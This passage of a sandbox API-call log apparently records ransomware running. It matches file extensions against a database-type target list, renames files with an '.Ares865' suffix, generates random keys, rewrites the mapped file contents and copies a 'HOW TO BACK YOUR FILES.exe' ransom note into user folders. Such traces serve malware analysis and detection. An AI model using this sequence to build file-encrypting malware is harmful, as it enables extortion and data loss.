lpString2="4dl") returned 1 [0092.307] lstrlenW (lpString="^^^") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.307] lstrlenW (lpString="abs") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.307] lstrlenW (lpString="abx") returned 3 [0092.307] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.307] lstrlenW (lpString="accdb") returned 5 [0092.307] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.307] lstrlenW (lpString="accdc") returned 5 [0092.307] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.307] lstrlenW (lpString="accde") returned 5 [0092.308] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.308] lstrlenW (lpString="accdr") returned 5 [0092.308] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.308] lstrlenW (lpString="accdt") returned 5 [0092.308] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.308] lstrlenW (lpString="accdw") returned 5 [0092.308] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.308] lstrlenW (lpString="accft") returned 5 [0092.308] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.308] lstrlenW (lpString="adb") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.308] lstrlenW (lpString="adb") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.308] lstrlenW (lpString="ade") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.308] lstrlenW (lpString="adf") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.308] lstrlenW (lpString="adn") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.308] lstrlenW (lpString="adp") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.308] lstrlenW (lpString="alf") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.308] lstrlenW (lpString="ask") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.308] lstrlenW (lpString="btr") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.308] lstrlenW (lpString="cat") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.308] lstrlenW (lpString="cdb") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.308] lstrlenW (lpString="ckp") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.308] lstrlenW (lpString="cma") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.308] lstrlenW (lpString="cpd") returned 3 [0092.308] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.309] lstrlenW (lpString="dacpac") returned 6 [0092.309] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.309] lstrlenW (lpString="dad") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.309] lstrlenW (lpString="dadiagrams") returned 10 [0092.309] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.309] lstrlenW (lpString="daschema") returned 8 [0092.309] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.309] lstrlenW (lpString="db-journal") returned 10 [0092.309] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.309] lstrlenW (lpString="db-shm") returned 6 [0092.309] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.309] lstrlenW (lpString="db-wal") returned 6 [0092.309] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.309] lstrlenW (lpString="dbc") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.309] lstrlenW (lpString="dbs") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.309] lstrlenW (lpString="dbt") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.309] lstrlenW (lpString="dbv") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.309] lstrlenW (lpString="dbx") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.309] lstrlenW (lpString="dcb") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dcb") returned 1 [0092.309] lstrlenW (lpString="dct") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dct") returned 1 [0092.309] lstrlenW (lpString="dcx") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dcx") returned 1 [0092.309] lstrlenW (lpString="ddl") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="ddl") returned 1 [0092.309] lstrlenW (lpString="dlis") returned 4 [0092.309] lstrcmpiW (lpString1=".ini", lpString2="dlis") returned -1 [0092.309] lstrlenW (lpString="dp1") returned 3 [0092.309] lstrcmpiW (lpString1="ini", lpString2="dp1") returned 1 [0092.309] lstrlenW (lpString="dqy") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="dqy") returned 1 [0092.310] lstrlenW (lpString="dsk") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="dsk") returned 1 [0092.310] lstrlenW (lpString="dsn") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="dsn") returned 1 [0092.310] lstrlenW (lpString="dtsx") returned 4 [0092.310] lstrcmpiW (lpString1=".ini", lpString2="dtsx") returned -1 [0092.310] lstrlenW (lpString="dxl") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="dxl") returned 1 [0092.310] lstrlenW (lpString="eco") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="eco") returned 1 [0092.310] lstrlenW (lpString="ecx") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="ecx") returned 1 [0092.310] lstrlenW (lpString="edb") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="edb") returned 1 [0092.310] lstrlenW (lpString="epim") returned 4 [0092.310] lstrcmpiW (lpString1=".ini", lpString2="epim") returned -1 [0092.310] lstrlenW (lpString="fcd") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="fcd") returned 1 [0092.310] lstrlenW (lpString="fdb") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0092.310] lstrlenW (lpString="fic") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0092.310] lstrlenW (lpString="flexolibrary") returned 12 [0092.310] lstrlenW (lpString="fm5") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0092.310] lstrlenW (lpString="fmp") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0092.310] lstrlenW (lpString="fmp12") returned 5 [0092.310] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0092.310] lstrlenW (lpString="fmpsl") returned 5 [0092.310] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0092.310] lstrlenW (lpString="fol") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0092.310] lstrlenW (lpString="fp3") returned 3 [0092.310] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0092.310] lstrlenW (lpString="fp4") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0092.311] lstrlenW (lpString="fp5") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0092.311] lstrlenW (lpString="fp7") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0092.311] lstrlenW (lpString="fpt") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0092.311] lstrlenW (lpString="frm") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0092.311] lstrlenW (lpString="gdb") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.311] lstrlenW (lpString="gdb") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0092.311] lstrlenW (lpString="grdb") returned 4 [0092.311] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0092.311] lstrlenW (lpString="gwi") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0092.311] lstrlenW (lpString="hdb") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0092.311] lstrlenW (lpString="his") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0092.311] lstrlenW (lpString="ib") returned 2 [0092.311] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0092.311] lstrlenW (lpString="idb") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0092.311] lstrlenW (lpString="ihx") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0092.311] lstrlenW (lpString="itdb") returned 4 [0092.311] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0092.311] lstrlenW (lpString="itw") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0092.311] lstrlenW (lpString="jet") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0092.311] lstrlenW (lpString="jtx") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0092.311] lstrlenW (lpString="kdb") returned 3 [0092.311] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0092.312] lstrlenW (lpString="kexi") returned 4 [0092.312] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0092.312] lstrlenW (lpString="kexic") returned 5 [0092.312] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0092.312] lstrlenW (lpString="kexis") returned 5 [0092.312] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0092.312] lstrlenW (lpString="lgc") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0092.312] lstrlenW (lpString="lwx") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0092.312] lstrlenW (lpString="maf") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0092.312] lstrlenW (lpString="maq") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0092.312] lstrlenW (lpString="mar") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0092.312] lstrlenW (lpString="marshal") returned 7 [0092.312] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0092.312] lstrlenW (lpString="mas") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0092.312] lstrlenW (lpString="mav") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0092.312] lstrlenW (lpString="maw") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0092.312] lstrlenW (lpString="mdbhtml") returned 7 [0092.312] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0092.312] lstrlenW (lpString="mdn") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0092.312] lstrlenW (lpString="mdt") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0092.312] lstrlenW (lpString="mfd") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0092.312] lstrlenW (lpString="mpd") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0092.312] lstrlenW (lpString="mrg") returned 3 [0092.312] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0092.312] lstrlenW (lpString="mud") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0092.313] lstrlenW (lpString="mwb") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0092.313] lstrlenW (lpString="myd") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0092.313] lstrlenW (lpString="ndf") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0092.313] lstrlenW (lpString="nnt") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0092.313] lstrlenW (lpString="nrmlib") returned 6 [0092.313] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0092.313] lstrlenW (lpString="ns2") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0092.313] lstrlenW (lpString="ns3") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0092.313] lstrlenW (lpString="ns4") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0092.313] lstrlenW (lpString="nsf") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0092.313] lstrlenW (lpString="nv") returned 2 [0092.313] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0092.313] lstrlenW (lpString="nv2") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0092.313] lstrlenW (lpString="nwdb") returned 4 [0092.313] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0092.313] lstrlenW (lpString="nyf") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0092.313] lstrlenW (lpString="odb") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.313] lstrlenW (lpString="odb") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0092.313] lstrlenW (lpString="oqy") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0092.313] lstrlenW (lpString="ora") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0092.313] lstrlenW (lpString="orx") returned 3 [0092.313] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0092.314] lstrlenW (lpString="owc") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0092.314] lstrlenW (lpString="p96") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0092.314] lstrlenW (lpString="p97") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0092.314] lstrlenW (lpString="pan") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0092.314] lstrlenW (lpString="pdb") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0092.314] lstrlenW (lpString="pdm") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0092.314] lstrlenW (lpString="pnz") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0092.314] lstrlenW (lpString="qry") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0092.314] lstrlenW (lpString="qvd") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0092.314] lstrlenW (lpString="rbf") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0092.314] lstrlenW (lpString="rctd") returned 4 [0092.314] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0092.314] lstrlenW (lpString="rod") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0092.314] lstrlenW (lpString="rodx") returned 4 [0092.314] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0092.314] lstrlenW (lpString="rpd") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0092.314] lstrlenW (lpString="rsd") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0092.314] lstrlenW (lpString="sas7bdat") returned 8 [0092.314] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0092.314] lstrlenW (lpString="sbf") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0092.314] lstrlenW (lpString="scx") returned 3 [0092.314] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0092.314] lstrlenW (lpString="sdb") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0092.315] lstrlenW (lpString="sdc") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0092.315] lstrlenW (lpString="sdf") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0092.315] lstrlenW (lpString="sis") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0092.315] lstrlenW (lpString="spq") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0092.315] lstrlenW (lpString="te") returned 2 [0092.315] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0092.315] lstrlenW (lpString="teacher") returned 7 [0092.315] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0092.315] lstrlenW (lpString="tmd") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0092.315] lstrlenW (lpString="tps") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0092.315] lstrlenW (lpString="trc") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.315] lstrlenW (lpString="trc") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0092.315] lstrlenW (lpString="trm") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0092.315] lstrlenW (lpString="udb") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0092.315] lstrlenW (lpString="udl") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0092.315] lstrlenW (lpString="usr") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0092.315] lstrlenW (lpString="v12") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0092.315] lstrlenW (lpString="vis") returned 3 [0092.315] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0092.316] lstrlenW (lpString="vpd") returned 3 [0092.316] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0092.316] lstrlenW (lpString="vvv") returned 3 [0092.316] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0092.316] lstrlenW (lpString="wdb") returned 3 [0092.316] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0092.316] lstrlenW (lpString="wmdb") returned 4 [0092.316] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0092.316] lstrlenW (lpString="wrk") returned 3 [0092.316] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0092.316] lstrlenW (lpString="xdb") returned 3 [0092.316] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0092.316] lstrlenW (lpString="xld") returned 3 [0092.316] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0092.316] lstrlenW (lpString="xmlff") returned 5 [0092.316] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0092.316] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865") returned 77 [0092.316] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\startup\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\startup\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.317] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Startup\\desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\startup\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.317] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=174) returned 1 [0092.317] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0092.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0092.318] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0092.318] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0270) returned 1 [0092.318] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.318] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0092.319] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3b0, lpName=0x0) returned 0x15c [0092.321] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3b0) returned 0x190000 [0092.321] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0270) returned 1 [0092.321] CryptGenRandom (in: hProv=0x2f0270, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.321] CryptReleaseContext (hProv=0x2f0270, dwFlags=0x0) returned 1 [0092.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0092.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0092.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0092.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0092.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0092.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0092.322] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0092.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0092.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0092.322] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0092.322] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0092.322] CloseHandle (hObject=0x15c) returned 1 [0092.322] CloseHandle (hObject=0x118) returned 1 [0092.323] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0092.323] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0092.323] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0092.323] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0c5c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0092.323] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0092.323] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d0c5c00, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4d0c5c00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 0 [0092.323] FindClose (in: hFindFile=0x2ccde8 | out: hFindFile=0x2ccde8) returned 1 [0092.323] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7a50 [0092.324] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance" [0092.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0092.324] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7a48 | out: hHeap=0x2b0000) returned 1 [0092.324] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance") returned 61 [0092.324] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance" [0092.324] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.324] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\start menu\\programs\\maintenance\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.324] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.324] GetLastError () returned 0x0 [0092.324] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.324] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.325] CloseHandle (hObject=0x120) returned 1 [0092.325] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.325] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.325] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Start Menu\\Programs\\Maintenance\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d0ebd60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 